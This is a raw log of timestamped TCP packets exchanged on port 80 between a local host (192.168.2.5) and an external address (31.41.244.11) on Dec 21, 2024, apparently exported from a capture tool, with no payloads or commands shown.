                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.124418974 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.124562025 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.124607086 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.125524044 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.125571966 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.125685930 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.125746012 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.126698971 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.126740932 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.126807928 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.126859903 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.127882957 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.127928019 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.127974033 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.128020048 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.129034996 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.129101038 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.129133940 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.129175901 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.130192041 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.130237103 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.130362034 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.130408049 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.131350994 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.131396055 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.131475925 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.131520033 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.132602930 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.132626057 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.132652998 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.132652998 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.133744001 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.133790016 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.133832932 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.133876085 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.134843111 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.134903908 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.134965897 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.135009050 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.136096954 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.136141062 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.136179924 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.136224031 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.137201071 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.137247086 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.137305021 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.137348890 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.138416052 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.138447046 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.138469934 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.138492107 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.139575005 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.139621973 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.139622927 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.139662027 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.140672922 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.140718937 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.140830994 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.140876055 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.141913891 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.141930103 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.141957998 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.141985893 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.143029928 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.143074989 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.143172979 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.143220901 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.144262075 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.144284010 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.144311905 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.144336939 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.145354986 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.145411015 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.145499945 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.145541906 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.146522999 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.146581888 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.146708012 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.146749973 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.147748947 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.147794008 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.147866964 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.147907019 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.148955107 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.148998976 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.149066925 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.149118900 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.150024891 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.150068045 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.150150061 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.150191069 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.151146889 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.151191950 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.151298046 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.151344061 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.152334929 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.152379036 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.152450085 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.152503967 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.153467894 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.153532028 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.153584957 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.153631926 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.154633999 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.154678106 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.154823065 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.154865026 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.155813932 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.155862093 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.155881882 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.155927896 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.156979084 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.157021999 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.157080889 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.157125950 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.158133030 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.158178091 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.158389091 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.158431053 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.159352064 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.159396887 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.159507036 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.159549952 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.160577059 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.160619974 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.160644054 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.160684109 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.161628008 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.161693096 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.292815924 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.292836905 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.292891026 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.292891979 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.293234110 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.293281078 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.293410063 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.293472052 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.294436932 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.294488907 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.294948101 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.294962883 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.294992924 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.295025110 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.296088934 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.296103954 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.296147108 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.297306061 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.297354937 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.297550917 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.297605038 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.298305988 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.298369884 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.298444986 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.298491001 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.299535990 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.299578905 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.299588919 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.299635887 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.300703049 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.300750017 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.300811052 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.300854921 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.301861048 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.301923037 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.301973104 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.302011967 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.303025961 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.303073883 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.303141117 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.303186893 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.304204941 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.304250956 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.304289103 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.304339886 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.305414915 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.305470943 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.305507898 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.305555105 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.306512117 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.306567907 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.306627035 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.306673050 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.307660103 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.307708979 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.307776928 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.307826996 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.308808088 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.308852911 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.308938980 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.308988094 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.309974909 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.310019970 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.310122967 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.310184002 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.311181068 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.311227083 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.311247110 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.311306000 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.312309027 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.312360048 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.312428951 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.312474012 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.313446999 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.313502073 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.313559055 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.313601017 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.314630032 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.314673901 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.314732075 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.314789057 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.315776110 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.315825939 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.315908909 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.315953970 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.316948891 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.316993952 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.317095995 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.317142963 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.318126917 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.318172932 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.318253040 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.318301916 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.319351912 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.319399118 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.319468021 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.319511890 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.320477009 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.320523024 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.320569992 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.320621014 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.321722984 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.321739912 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.321773052 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.321800947 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.322786093 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.322830915 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.322930098 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.322978973 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.323971987 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.324014902 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.324076891 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.324124098 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.325189114 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.325248003 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.325318098 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.325361013 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.326299906 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.326358080 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.326409101 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.326457024 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.327487946 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.327537060 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.327697992 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.327747107 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.328605890 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.328660965 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.328727007 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.328774929 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.329783916 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.329833031 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.329922915 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.329967976 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.331012011 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.331057072 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.331058979 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.331111908 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.332103968 CET804982831.41.244.11192.168.2.5
